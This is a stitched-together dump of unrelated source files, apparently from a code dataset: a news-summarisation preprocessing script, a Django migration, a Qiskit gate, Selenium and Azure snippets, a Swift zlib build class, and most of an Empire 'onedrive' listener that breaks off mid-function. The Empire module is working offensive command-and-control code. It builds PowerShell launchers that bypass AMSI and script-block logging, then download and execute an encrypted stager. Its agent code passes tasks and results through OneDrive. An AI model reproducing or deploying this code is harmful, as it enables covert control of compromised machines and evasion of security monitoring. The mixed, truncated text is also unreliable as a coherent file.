next_is_highlight = False
for idx,line in enumerate(lines):
if line.strip() == "":
continue # empty line
elif line.startswith("@highlight"):
next_is_highlight = True
elif next_is_highlight:
highlights.append(line)
else:
article_lines.append(line)
# Make article into a single string
article = article_lines
abstract = highlights
return article, abstract
def fix_missing_period(line):
"""Adds a period to a line that is missing a period"""
if "@highlight" in line: return line
if line=="": return line
if line[-1] in END_TOKENS: return line
# print line[-1]
return line + " ."
def init_worker():
global nlp
nlp = spacy.load('en', parser=False)
nlp.tokenizer = WhitespaceTokenizer(nlp.vocab)
def preprocess_inputs(args):
story_file, inputs_dir, labels_dir, abs_dir = args
global nlp
article, abstract = get_art_abs(story_file)
abstract_text = fix_summary(abstract)
inputs = fix_article(article, nlp)
story_id = os.path.basename(story_file).split(".")[0]
if len(inputs) == 0:
print("\nBAD:", story_id)
return None
example = {"id": story_id, "inputs": inputs}
inputs_path = inputs_dir / "{}.json".format(story_id)
inputs_path.write_text(json.dumps(example))
abs_path = abs_dir / "{}.spl".format(story_id)
abs_path.write_text(abstract_text)
labels = get_labels(example, [abstract_text], 50)
labels_path = labels_dir / "{}.json".format(story_id)
labels_path.write_text(json.dumps(labels))
def get_labels(example, summary_texts, sent_limit):
input_texts = [input["text"] if input["word_count"] > 2 else "@@@@@@"
for input in example["inputs"]][:sent_limit]
ranks, pairwise_ranks = rouge_papier.compute_extract(
input_texts, summary_texts, mode="sequential", ngram=1,
remove_stopwords=True, length=100)
labels = [1 if r > 0 else 0 for r in ranks]
if len(labels) < len(example["inputs"]):
delta = len(example["inputs"]) - len(labels)
labels.extend([0] * delta)
return {"id": example["id"], "labels": labels}
def write_to_file(url_path, cnn_dir, dm_dir, inputs_dir,
labels_dir, abs_dir, pool):
inputs_dir.mkdir(exist_ok=True, parents=True)
labels_dir.mkdir(exist_ok=True, parents=True)
abs_dir.mkdir(exist_ok=True, parents=True)
url_list = read_text_file(url_path)
url_hashes = get_url_hashes(url_list)
story_fnames = [s+".story" for s in url_hashes]
num_stories = len(story_fnames)
story_paths = []
for fn in story_fnames:
if os.path.isfile(os.path.join(cnn_dir, fn)):
story_paths.append(
(os.path.join(cnn_dir, fn), inputs_dir, labels_dir, abs_dir))
elif os.path.isfile(os.path.join(dm_dir, fn)):
story_paths.append(
(os.path.join(dm_dir, fn), inputs_dir, labels_dir, abs_dir))
else:
raise Exception("Missing file for story {}".format(fn))
result_iter = pool.imap(preprocess_inputs, story_paths)
for idx, result in enumerate(result_iter, 1):
print(
"Writing story {}/{}".format(idx, num_stories),
end="\r" if idx < num_stories else "\n",
flush=True)
def main():
CNN_TOK_GID = "0BzQ6rtO2VN95cmNuc2xwUS1wdEE"
CNN_TOK_EXPECTED_SIZE = 207268941
DM_TOK_GID = "0BzQ6rtO2VN95bndCZDdpdXJDV1U"
DM_TOK_EXPECTED_SIZE = 482735659
parser = argparse.ArgumentParser()
parser.add_argument("--data-dir", type=pathlib.Path, required=True)
parser.add_argument(
"--procs", type=int, required=False, default=None)
args = parser.parse_args()
if args.procs is None:
args.procs = min(cpu_count(), 16)
try:
workdir = tempfile.mkdtemp()
print("Downloading train/val/test splits.")
train_urls, val_urls, test_urls = download_urls(workdir)
DM_TOK_ZIP = os.path.join(workdir, "dm_stories_tokenized.zip")
CNN_TOK_ZIP = os.path.join(workdir, "cnn_stories_tokenized.zip")
DM_TOK_STORIES = os.path.join(workdir, "dm_stories_tokenized")
CNN_TOK_STORIES = os.path.join(workdir, "cnn_stories_tokenized")
print("Downloading DailyMail data from googledrive.")
download_file_from_google_drive(
DM_TOK_GID, DM_TOK_EXPECTED_SIZE, DM_TOK_ZIP)
print("Unpacking DailMail data.")
unzip_file(DM_TOK_ZIP, workdir)
print("Downloading CNN data from googledrive.")
download_file_from_google_drive(
CNN_TOK_GID, CNN_TOK_EXPECTED_SIZE, CNN_TOK_ZIP)
print("Unpacking CNN data.")
unzip_file(CNN_TOK_ZIP, workdir)
check_num_stories(CNN_TOK_STORIES, NUM_EXPECTED_CNN_STORIES)
check_num_stories(DM_TOK_STORIES, NUM_EXPECTED_DM_STORIES)
data_dir = args.data_dir / "cnn-dailymail"
train_stories = data_dir / "inputs" / "train"
val_stories = data_dir / "inputs" / "valid"
test_stories = data_dir / "inputs" / "test"
train_labels = data_dir / "labels" / "train"
val_labels = data_dir / "labels" / "valid"
test_labels = data_dir / "labels" / "test"
train_abstracts = data_dir / "human-abstracts" / "train"
valid_abstracts = data_dir / "human-abstracts" / "valid"
test_abstracts = data_dir / "human-abstracts" / "test"
pool = Pool(args.procs, initializer=init_worker)
print("Writing cnn/dailymail validation data...")
write_to_file(
val_urls,
CNN_TOK_STORIES,
DM_TOK_STORIES,
val_stories,
val_labels,
valid_abstracts,
pool)
print("Writing cnn/dailymail train data...")
write_to_file(
train_urls,
CNN_TOK_STORIES,
DM_TOK_STORIES,
train_stories,
train_labels,
train_abstracts,
pool)
print("Writing cnn/dailymail test data...")
write_to_file(
test_urls,
CNN_TOK_STORIES,
DM_TOK_STORIES,
test_stories,
test_labels,
test_abstracts,
pool)
finally:
shutil.rmtree(workdir)
if __name__ == "__main__":
main()
| 32.636856 | 215 | 0.61488 |
f7e084176b8928ef086e3b810e017bfd178b34ed | 403 | py | Python | evap/grades/migrations/0010_gradedocument_description_en_add_unique.py | felixrindt/EvaP | fe65fcc511cc942695ce1edbaab170894f0d37b1 | [
"MIT"
] | 29 | 2020-02-28T23:03:41.000Z | 2022-02-19T09:29:36.000Z | evap/grades/migrations/0010_gradedocument_description_en_add_unique.py | felixrindt/EvaP | fe65fcc511cc942695ce1edbaab170894f0d37b1 | [
"MIT"
] | 737 | 2015-01-02T17:43:25.000Z | 2018-12-10T20:45:10.000Z | evap/grades/migrations/0010_gradedocument_description_en_add_unique.py | felixrindt/EvaP | fe65fcc511cc942695ce1edbaab170894f0d37b1 | [
"MIT"
] | 83 | 2015-01-14T12:39:41.000Z | 2018-10-29T16:36:43.000Z | # Generated by Django 1.9 on 2016-02-01 18:19
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('grades', '0009_fill_description_en'),
]
operations = [
migrations.AlterUniqueTogether(
name='gradedocument',
unique_together=set([('course', 'description_de'), ('course', 'description_en')]),
),
]
| 22.388889 | 94 | 0.620347 |
d72316a437223092416ef9f2809b646b559cf672 | 1,952 | py | Python | qiskit/extensions/standard/rz.py | PierreDC/qiskit-sdk-py | e879167ac86ee731f53ee71c10210ba37e4559ab | [
"Apache-2.0"
] | null | null | null | qiskit/extensions/standard/rz.py | PierreDC/qiskit-sdk-py | e879167ac86ee731f53ee71c10210ba37e4559ab | [
"Apache-2.0"
] | null | null | null | qiskit/extensions/standard/rz.py | PierreDC/qiskit-sdk-py | e879167ac86ee731f53ee71c10210ba37e4559ab | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2017, IBM.
#
# This source code is licensed under the Apache License, Version 2.0 found in
# the LICENSE.txt file in the root directory of this source tree.
# pylint: disable=invalid-name
"""
Rotation around the z-axis.
"""
from qiskit import Gate
from qiskit import InstructionSet
from qiskit import QuantumCircuit
from qiskit import QuantumRegister
from qiskit.dagcircuit import DAGCircuit
from qiskit.extensions.standard import header # pylint: disable=unused-import
from qiskit.extensions.standard.u1 import U1Gate
class RZGate(Gate):
"""rotation around the z-axis."""
def __init__(self, phi, qubit, circ=None):
"""Create new rz single qubit gate."""
super().__init__("rz", [phi], [qubit], circ)
self._define_decompositions()
def _define_decompositions(self):
"""
gate rz(phi) a { u1(phi) a; }
"""
decomposition = DAGCircuit()
q = QuantumRegister(1, "q")
decomposition.add_qreg(q)
decomposition.add_basis_element("u1", 1, 0, 1)
rule = [
U1Gate(self.param[0], q[0])
]
for inst in rule:
decomposition.apply_operation_back(inst)
self._decompositions = [decomposition]
def inverse(self):
"""Invert this gate.
rz(phi)^dagger = rz(-phi)
"""
self.param[0] = -self.param[0]
self._define_decompositions()
return self
def reapply(self, circ):
"""Reapply this gate to corresponding qubits in circ."""
self._modifiers(circ.rz(self.param[0], self.qargs[0]))
def rz(self, phi, q):
"""Apply Rz to q."""
if isinstance(q, QuantumRegister):
instructions = InstructionSet()
for j in range(q.size):
instructions.add(self.rz(phi, (q, j)))
return instructions
self._check_qubit(q)
return self._attach(RZGate(phi, q, self))
QuantumCircuit.rz = rz
| 27.111111 | 78 | 0.632684 |
4292e984335fc38e0c22bee14d1a5441a6ba06ba | 302 | py | Python | python/LinkedInLearning/Ex_Files_Python_Automation_Testing/Exercise Files/CH03/03_01/code_03_01.py | Youngermaster/Selenium-Scripts | e8e785780ee83e4b4f122f64bd61189f33a1825a | [
"MIT"
] | null | null | null | python/LinkedInLearning/Ex_Files_Python_Automation_Testing/Exercise Files/CH03/03_01/code_03_01.py | Youngermaster/Selenium-Scripts | e8e785780ee83e4b4f122f64bd61189f33a1825a | [
"MIT"
] | null | null | null | python/LinkedInLearning/Ex_Files_Python_Automation_Testing/Exercise Files/CH03/03_01/code_03_01.py | Youngermaster/Selenium-Scripts | e8e785780ee83e4b4f122f64bd61189f33a1825a | [
"MIT"
] | null | null | null | from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
driver= webdriver.Firefox()
driver.get("http://python.org");
search = driver.find_element_by_name('q');
search.clear();
search.send_keys("pycon");
search.send_keys(Keys.RETURN);
time.sleep(4)
driver.close();
| 20.133333 | 47 | 0.768212 |
e441cabf4f5ff6f09fd3b8c8b855674f8bb8b376 | 1,349 | py | Python | sdk/network/azure-mgmt-dns/azure/mgmt/dns/v2018_03_01_preview/models/_paged_models.py | iscai-msft/azure-sdk-for-python | 83715b95c41e519d5be7f1180195e2fba136fc0f | [
"MIT"
] | 8 | 2021-01-13T23:44:08.000Z | 2021-03-17T10:13:36.000Z | sdk/network/azure-mgmt-dns/azure/mgmt/dns/v2018_03_01_preview/models/_paged_models.py | iscai-msft/azure-sdk-for-python | 83715b95c41e519d5be7f1180195e2fba136fc0f | [
"MIT"
] | 226 | 2019-07-24T07:57:21.000Z | 2019-10-15T01:07:24.000Z | sdk/network/azure-mgmt-dns/azure/mgmt/dns/v2018_03_01_preview/models/_paged_models.py | iscai-msft/azure-sdk-for-python | 83715b95c41e519d5be7f1180195e2fba136fc0f | [
"MIT"
] | 2 | 2020-05-21T22:51:22.000Z | 2020-05-26T20:53:01.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.paging import Paged
class RecordSetPaged(Paged):
"""
A paging container for iterating over a list of :class:`RecordSet <azure.mgmt.dns.v2018_03_01_preview.models.RecordSet>` object
"""
_attribute_map = {
'next_link': {'key': 'nextLink', 'type': 'str'},
'current_page': {'key': 'value', 'type': '[RecordSet]'}
}
def __init__(self, *args, **kwargs):
super(RecordSetPaged, self).__init__(*args, **kwargs)
class ZonePaged(Paged):
"""
A paging container for iterating over a list of :class:`Zone <azure.mgmt.dns.v2018_03_01_preview.models.Zone>` object
"""
_attribute_map = {
'next_link': {'key': 'nextLink', 'type': 'str'},
'current_page': {'key': 'value', 'type': '[Zone]'}
}
def __init__(self, *args, **kwargs):
super(ZonePaged, self).__init__(*args, **kwargs)
| 32.902439 | 131 | 0.582654 |
1780df502749998e5ea90bd8f187fe88eff955c6 | 3,484 | py | Python | utils/swift_build_support/swift_build_support/products/zlib.py | xjc90s/swift | cafe5ccbd1b7aa9cc9c837c5be2cdf3d5acd8a49 | [
"Apache-2.0"
] | 1 | 2022-03-27T15:28:07.000Z | 2022-03-27T15:28:07.000Z | utils/swift_build_support/swift_build_support/products/zlib.py | xjc90s/swift | cafe5ccbd1b7aa9cc9c837c5be2cdf3d5acd8a49 | [
"Apache-2.0"
] | null | null | null | utils/swift_build_support/swift_build_support/products/zlib.py | xjc90s/swift | cafe5ccbd1b7aa9cc9c837c5be2cdf3d5acd8a49 | [
"Apache-2.0"
] | null | null | null | # swift_build_support/products/zlib.py ------------------------------------
#
# This source file is part of the Swift.org open source project
#
# Copyright (c) 2014 - 2017 Apple Inc. and the Swift project authors
# Licensed under Apache License v2.0 with Runtime Library Exception
#
# See https://swift.org/LICENSE.txt for license information
# See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
#
# ----------------------------------------------------------------------------
from . import cmake_product
from . import earlyswiftdriver
class Zlib(cmake_product.CMakeProduct):
@classmethod
def is_build_script_impl_product(cls):
"""is_build_script_impl_product -> bool
Whether this product is produced by build-script-impl
"""
return False
@classmethod
def is_before_build_script_impl_product(cls):
"""is_before_build_script_impl_product -> bool
Whether this product is built before any build-script-impl products
"""
return True
@classmethod
def is_nondarwin_only_build_product(cls):
return True
@classmethod
def get_dependencies(cls):
return [earlyswiftdriver.EarlySwiftDriver]
def should_build(self, host_target):
"""should_build() -> Bool
Return True if zlib should be built
"""
return self.args.build_zlib
def should_test(self, host_target):
"""should_test() -> Bool
Returns True if zlib should be tested.
Currently is set to false
"""
return False
def should_install(self, host_target):
"""should_install() -> Bool
Returns True
If we're building zlib, you're going to need it
"""
return self.args.build_zlib
def install(self, host_target):
"""
Install zlib to the target location
"""
path = self.host_install_destdir(host_target)
self.install_with_cmake(['install'], path)
def build(self, host_target):
self.cmake_options.define('BUILD_SHARED_LIBS', 'NO')
self.cmake_options.define('CMAKE_POSITION_INDEPENDENT_CODE', 'YES')
if self.args.zlib_build_variant is None:
self.args.zlib_build_variant = "Release"
self.cmake_options.define('CMAKE_BUILD_TYPE:STRING',
self.args.zlib_build_variant)
self.cmake_options.define('CMAKE_BUILD_TYPE', 'RELEASE')
self.cmake_options.define('SKIP_INSTALL_FILES', 'YES')
self.cmake_options.define('CMAKE_INSTALL_PREFIX', '/usr')
(platform, arch) = host_target.split('-')
common_c_flags = ' '.join(self.common_cross_c_flags(platform, arch))
self.cmake_options.define('CMAKE_C_FLAGS', common_c_flags)
self.cmake_options.define('CMAKE_CXX_FLAGS', common_c_flags)
if host_target.startswith("macosx") or \
host_target.startswith("iphone") or \
host_target.startswith("appletv") or \
host_target.startswith("watch"):
toolchain_file = self.generate_darwin_toolchain_file(platform, arch)
self.cmake_options.define('CMAKE_TOOLCHAIN_FILE:PATH', toolchain_file)
elif platform == "linux":
toolchain_file = self.generate_linux_toolchain_file(platform, arch)
self.cmake_options.define('CMAKE_TOOLCHAIN_FILE:PATH', toolchain_file)
self.build_with_cmake(["all"], self.args.zlib_build_variant, [])
| 35.191919 | 82 | 0.648393 |
43c688e3d614c8b3aaba57456499b558fe4921b5 | 44,373 | py | Python | lib/listeners/onedrive.py | CykuTW/Empire | af30a1f20abc09366e9af83b51fb7566b7ebb3bd | [
"BSD-3-Clause"
] | 3 | 2020-03-24T04:37:00.000Z | 2021-04-07T06:05:16.000Z | lib/listeners/onedrive.py | TheWover/Empire | bf0225a773ac2b822b2eb5df655875dc014ca5b0 | [
"BSD-3-Clause"
] | null | null | null | lib/listeners/onedrive.py | TheWover/Empire | bf0225a773ac2b822b2eb5df655875dc014ca5b0 | [
"BSD-3-Clause"
] | null | null | null | from __future__ import print_function
from builtins import str
from builtins import object
import base64
import random
import os
import re
import time
from datetime import datetime
import copy
import traceback
import sys
import json
from pydispatch import dispatcher
from requests import Request, Session
# Empire imports
from lib.common import helpers
from lib.common import agents
from lib.common import encryption
from lib.common import packets
from lib.common import messages
from lib.common import bypasses
class Listener(object):
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Onedrive',
'Author': ['@mr64bit'],
'Description': (
'Starts a Onedrive listener. Setup instructions here: gist.github.com/mr64bit/3fd8f321717c9a6423f7949d494b6cd9'),
'Category': ('third_party'),
'Comments': ["Note that deleting STAGE0-PS.txt from the staging folder will break existing launchers"]
}
self.options = {
'Name': {
'Description': 'Name for the listener.',
'Required': True,
'Value': 'onedrive'
},
'ClientID': {
'Description': 'Application ID of the OAuth App.',
'Required': True,
'Value': ''
},
'ClientSecret': {
'Description': 'Client secret of the OAuth App.',
'Required': True,
'Value': ''
},
'AuthCode': {
'Description': 'Auth code given after authenticating OAuth App.',
'Required': True,
'Value': ''
},
'BaseFolder': {
'Description': 'The base Onedrive folder to use for comms.',
'Required': True,
'Value': 'empire'
},
'StagingFolder': {
'Description': 'The nested Onedrive staging folder.',
'Required': True,
'Value': 'staging'
},
'TaskingsFolder': {
'Description': 'The nested Onedrive taskings folder.',
'Required': True,
'Value': 'taskings'
},
'ResultsFolder': {
'Description': 'The nested Onedrive results folder.',
'Required': True,
'Value': 'results'
},
'Launcher': {
'Description': 'Launcher string.',
'Required': True,
'Value': 'powershell -noP -sta -w 1 -enc '
},
'StagingKey': {
'Description': 'Staging key for intial agent negotiation.',
'Required': True,
'Value': 'asdf'
},
'PollInterval': {
'Description': 'Polling interval (in seconds) to communicate with Onedrive.',
'Required': True,
'Value': '5'
},
'DefaultDelay': {
'Description': 'Agent delay/reach back interval (in seconds).',
'Required': True,
'Value': 10
},
'DefaultJitter': {
'Description': 'Jitter in agent reachback interval (0.0-1.0).',
'Required': True,
'Value': 0.0
},
'DefaultLostLimit': {
'Description': 'Number of missed checkins before exiting',
'Required': True,
'Value': 10
},
'DefaultProfile': {
'Description': 'Default communication profile for the agent.',
'Required': True,
'Value': "N/A|Microsoft SkyDriveSync 17.005.0107.0008 ship; Windows NT 10.0 (16299)"
},
'KillDate': {
'Description': 'Date for the listener to exit (MM/dd/yyyy).',
'Required': False,
'Value': ''
},
'WorkingHours': {
'Description': 'Hours for the agent to operate (09:00-17:00).',
'Required': False,
'Value': ''
},
'RefreshToken': {
'Description': 'Refresh token used to refresh the auth token',
'Required': False,
'Value': ''
},
'RedirectURI': {
'Description': 'Redirect URI of the registered application',
'Required': True,
'Value': "https://login.live.com/oauth20_desktop.srf"
},
'SlackToken': {
'Description': 'Your SlackBot API token to communicate with your Slack instance.',
'Required': False,
'Value': ''
},
'SlackChannel': {
'Description': 'The Slack channel or DM that notifications will be sent to.',
'Required': False,
'Value': '#general'
}
}
self.mainMenu = mainMenu
self.threads = {}
self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0])
def default_response(self):
return ''
def validate_options(self):
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
# If we don't have an OAuth code yet, give the user a URL to get it
if (str(self.options['RefreshToken']['Value']).strip() == '') and (
str(self.options['AuthCode']['Value']).strip() == ''):
if (str(self.options['ClientID']['Value']).strip() == ''):
print(helpers.color("[!] ClientID needed to generate AuthCode URL!"))
return False
params = {'client_id': str(self.options['ClientID']['Value']).strip(),
'response_type': 'code',
'redirect_uri': self.options['RedirectURI']['Value'],
'scope': 'files.readwrite offline_access'}
req = Request('GET', 'https://login.microsoftonline.com/common/oauth2/v2.0/authorize', params=params)
prep = req.prepare()
print(helpers.color("[*] Get your AuthCode from \"%s\" and try starting the listener again." % prep.url))
return False
for key in self.options:
if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''):
print(helpers.color("[!] Option \"%s\" is required." % (key)))
return False
return True
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default',
proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='',
listenerName=None, scriptLogBypass=True, AMSIBypass=True, AMSIBypass2=False):
if not language:
print(helpers.color("[!] listeners/onedrive generate_launcher(): No language specified"))
if listenerName and (listenerName in self.threads) and (
listenerName in self.mainMenu.listeners.activeListeners):
listener_options = self.mainMenu.listeners.activeListeners[listenerName]['options']
staging_key = listener_options['StagingKey']['Value']
profile = listener_options['DefaultProfile']['Value']
launcher_cmd = listener_options['Launcher']['Value']
staging_key = listener_options['StagingKey']['Value']
poll_interval = listener_options['PollInterval']['Value']
base_folder = listener_options['BaseFolder']['Value'].strip("/")
staging_folder = listener_options['StagingFolder']['Value']
taskings_folder = listener_options['TaskingsFolder']['Value']
results_folder = listener_options['ResultsFolder']['Value']
if language.startswith("power"):
launcher = "$ErrorActionPreference = 'SilentlyContinue';" # Set as empty string for debugging
if safeChecks.lower() == 'true':
launcher = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass
if scriptLogBypass:
launcher += bypasses.scriptBlockLogBypass()
# @mattifestation's AMSI bypass
if AMSIBypass:
launcher += bypasses.AMSIBypass()
# rastamouse AMSI bypass
if AMSIBypass2:
launcher += bypasses.AMSIBypass2()
launcher += "};"
launcher += helpers.randomize_capitalization(
"[System.Net.ServicePointManager]::Expect100Continue=0;")
launcher += helpers.randomize_capitalization("$wc=New-Object SYstem.Net.WebClient;")
if userAgent.lower() == 'default':
profile = listener_options['DefaultProfile']['Value']
userAgent = profile.split("|")[1]
launcher += "$u='" + userAgent + "';"
if userAgent.lower() != 'none' or proxy.lower() != 'none':
if userAgent.lower() != 'none':
launcher += helpers.randomize_capitalization("$wc.Headers.Add(")
launcher += "'User-Agent',$u);"
if proxy.lower() != 'none':
if proxy.lower() == 'default':
launcher += helpers.randomize_capitalization(
"$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;")
else:
launcher += helpers.randomize_capitalization("$proxy=New-Object Net.WebProxy;")
launcher += helpers.randomize_capitalization("$proxy.Address = '" + proxy.lower() + "';")
launcher += helpers.randomize_capitalization("$wc.Proxy = $proxy;")
if proxyCreds.lower() == "default":
launcher += helpers.randomize_capitalization(
"$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;")
else:
username = proxyCreds.split(":")[0]
password = proxyCreds.split(":")[1]
domain = username.split("\\")[0]
usr = username.split("\\")[1]
launcher += "$netcred = New-Object System.Net.NetworkCredential('" + usr + "','" + password + "','" + domain + "');"
launcher += helpers.randomize_capitalization("$wc.Proxy.Credentials = $netcred;")
launcher += "$Script:Proxy = $wc.Proxy;"
# code to turn the key string into a byte array
launcher += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(")
launcher += ("'%s');" % staging_key)
# this is the minimized RC4 launcher code from rc4.ps1
launcher += helpers.randomize_capitalization(
'$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};')
launcher += helpers.randomize_capitalization("$data=$wc.DownloadData('")
launcher += self.mainMenu.listeners.activeListeners[listenerName]['stager_url']
launcher += helpers.randomize_capitalization("');$iv=$data[0..3];$data=$data[4..$data.length];")
launcher += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX")
if obfuscate:
launcher = helpers.obfuscate(self.mainMenu.installPath, launcher,
obfuscationCommand=obfuscationCommand)
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(launcher, launcher_cmd)
else:
return launcher
if language.startswith("pyth"):
print(helpers.color("[!] listeners/onedrive generate_launcher(): Python agent not implimented yet"))
return "python not implimented yet"
else:
print(helpers.color("[!] listeners/onedrive generate_launcher(): invalid listener name"))
def generate_stager(self, listenerOptions, encode=False, encrypt=True, language=None, token=None):
"""
Generate the stager code
"""
if not language:
print(helpers.color("[!] listeners/onedrive generate_stager(): no language specified"))
return None
staging_key = listenerOptions['StagingKey']['Value']
base_folder = listenerOptions['BaseFolder']['Value']
staging_folder = listenerOptions['StagingFolder']['Value']
working_hours = listenerOptions['WorkingHours']['Value']
profile = listenerOptions['DefaultProfile']['Value']
agent_delay = listenerOptions['DefaultDelay']['Value']
if language.lower() == 'powershell':
f = open("%s/data/agent/stagers/onedrive.ps1" % self.mainMenu.installPath)
stager = f.read()
f.close()
stager = stager.replace("REPLACE_STAGING_FOLDER", "%s/%s" % (base_folder, staging_folder))
stager = stager.replace('REPLACE_STAGING_KEY', staging_key)
stager = stager.replace("REPLACE_TOKEN", token)
stager = stager.replace("REPLACE_POLLING_INTERVAL", str(agent_delay))
if working_hours != "":
stager = stager.replace("REPLACE_WORKING_HOURS", working_hours)
randomized_stager = ''
for line in stager.split("\n"):
line = line.strip()
if not line.startswith("#"):
if "\"" not in line:
randomized_stager += helpers.randomize_capitalization(line)
else:
randomized_stager += line
if encode:
return helpers.enc_powershell(randomized_stager)
elif encrypt:
RC4IV = os.urandom(4)
staging_key = staging_key.encode('UTF-8')
return RC4IV + encryption.rc4(RC4IV + staging_key, randomized_stager.encode('UTF-8'))
else:
return randomized_stager
else:
print(helpers.color("[!] Python agent not available for Onedrive"))
def generate_comms(self, listener_options, client_id, client_secret, token, refresh_token, redirect_uri,
language=None):
staging_key = listener_options['StagingKey']['Value']
base_folder = listener_options['BaseFolder']['Value']
taskings_folder = listener_options['TaskingsFolder']['Value']
results_folder = listener_options['ResultsFolder']['Value']
if not language:
print(helpers.color("[!] listeners/onedrive generate_comms(): No language specified"))
return
if language.lower() == "powershell":
# Function to generate a WebClient object with the required headers
token_manager = """
$Script:TokenObject = @{token="%s";refresh="%s";expires=(Get-Date).addSeconds(3480)};
$script:GetWebClient = {
$wc = New-Object System.Net.WebClient
$wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$wc.Proxy = $Script:Proxy;
}
if((Get-Date) -gt $Script:TokenObject.expires) {
$data = New-Object System.Collections.Specialized.NameValueCollection
$data.add("client_id", "%s")
$data.add("client_secret", "%s")
$data.add("grant_type", "refresh_token")
$data.add("scope", "files.readwrite offline_access")
$data.add("refresh_token", $Script:TokenObject.refresh)
$data.add("redirect_uri", "%s")
$bytes = $wc.UploadValues("https://login.microsoftonline.com/common/oauth2/v2.0/token", "POST", $data)
$response = [system.text.encoding]::ascii.getstring($bytes)
$Script:TokenObject.token = [regex]::match($response, '"access_token":"(.+?)"').groups[1].value
$Script:TokenObject.refresh = [regex]::match($response, '"refresh_token":"(.+?)"').groups[1].value
$expires_in = [int][regex]::match($response, '"expires_in":([0-9]+)').groups[1].value
$Script:TokenObject.expires = (get-date).addSeconds($expires_in - 15)
}
$wc.headers.add("User-Agent", $script:UserAgent)
$wc.headers.add("Authorization", "Bearer $($Script:TokenObject.token)")
$Script:Headers.GetEnumerator() | ForEach-Object {$wc.Headers.Add($_.Name, $_.Value)}
$wc
}
""" % (token, refresh_token, client_id, client_secret, redirect_uri)
post_message = """
$script:SendMessage = {
param($packets)
if($packets) {
$encBytes = encrypt-bytes $packets
$RoutingPacket = New-RoutingPacket -encData $encBytes -Meta 5
} else {
$RoutingPacket = ""
}
$wc = (& $GetWebClient)
$resultsFolder = "%s"
try {
try {
$data = $null
$data = $wc.DownloadData("https://graph.microsoft.com/v1.0/drive/root:/$resultsFolder/$($script:SessionID).txt:/content")
} catch {}
if($data -and $data.length -ne 0) {
$routingPacket = $data + $routingPacket
}
$wc = (& $GetWebClient)
$null = $wc.UploadData("https://graph.microsoft.com/v1.0/drive/root:/$resultsFolder/$($script:SessionID).txt:/content", "PUT", $RoutingPacket)
$script:missedChecking = 0
$script:lastseen = get-date
}
catch {
if($_ -match "Unable to connect") {
$script:missedCheckins += 1
}
}
}
""" % ("%s/%s" % (base_folder, results_folder))
get_message = """
$script:lastseen = Get-Date
$script:GetTask = {
try {
$wc = (& $GetWebClient)
$TaskingsFolder = "%s"
#If we haven't sent a message recently...
if($script:lastseen.addseconds($script:AgentDelay * 2) -lt (get-date)) {
(& $SendMessage -packets "")
}
$script:MissedCheckins = 0
$data = $wc.DownloadData("https://graph.microsoft.com/v1.0/drive/root:/$TaskingsFolder/$($script:SessionID).txt:/content")
if($data -and ($data.length -ne 0)) {
$wc = (& $GetWebClient)
$null = $wc.UploadString("https://graph.microsoft.com/v1.0/drive/root:/$TaskingsFolder/$($script:SessionID).txt", "DELETE", "")
if([system.text.encoding]::utf8.getString($data) -eq "RESTAGE") {
Start-Negotiate -T $script:TokenObject.token -SK $SK -PI $PI -UA $UA
}
$Data
}
}
catch {
if($_ -match "Unable to connect") {
$script:MissedCheckins += 1
}
}
}
""" % ("%s/%s" % (base_folder, taskings_folder))
return token_manager + post_message + get_message
def generate_agent(self, listener_options, client_id, client_secret, token, refresh_token, redirect_uri,
language=None):
"""
Generate the agent code
"""
if not language:
print(helpers.color("[!] listeners/onedrive generate_agent(): No language specified"))
return
language = language.lower()
delay = listener_options['DefaultDelay']['Value']
jitter = listener_options['DefaultJitter']['Value']
profile = listener_options['DefaultProfile']['Value']
lost_limit = listener_options['DefaultLostLimit']['Value']
working_hours = listener_options['WorkingHours']['Value']
kill_date = listener_options['KillDate']['Value']
b64_default_response = base64.b64encode(self.default_response().encode('UTF-8'))
if language == 'powershell':
f = open(self.mainMenu.installPath + "/data/agent/agent.ps1")
agent_code = f.read()
f.close()
comms_code = self.generate_comms(listener_options, client_id, client_secret, token, refresh_token,
redirect_uri, language)
agent_code = agent_code.replace("REPLACE_COMMS", comms_code)
agent_code = helpers.strip_powershell_comments(agent_code)
agent_code = agent_code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
agent_code = agent_code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
agent_code = agent_code.replace(
'$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
"$Profile = \"" + str(profile) + "\"")
agent_code = agent_code.replace('$LostLimit = 60', "$LostLimit = " + str(lost_limit))
agent_code = agent_code.replace('$DefaultResponse = ""',
'$DefaultResponse = "' + b64_default_response.decode('UTF-8') + '"')
if kill_date != "":
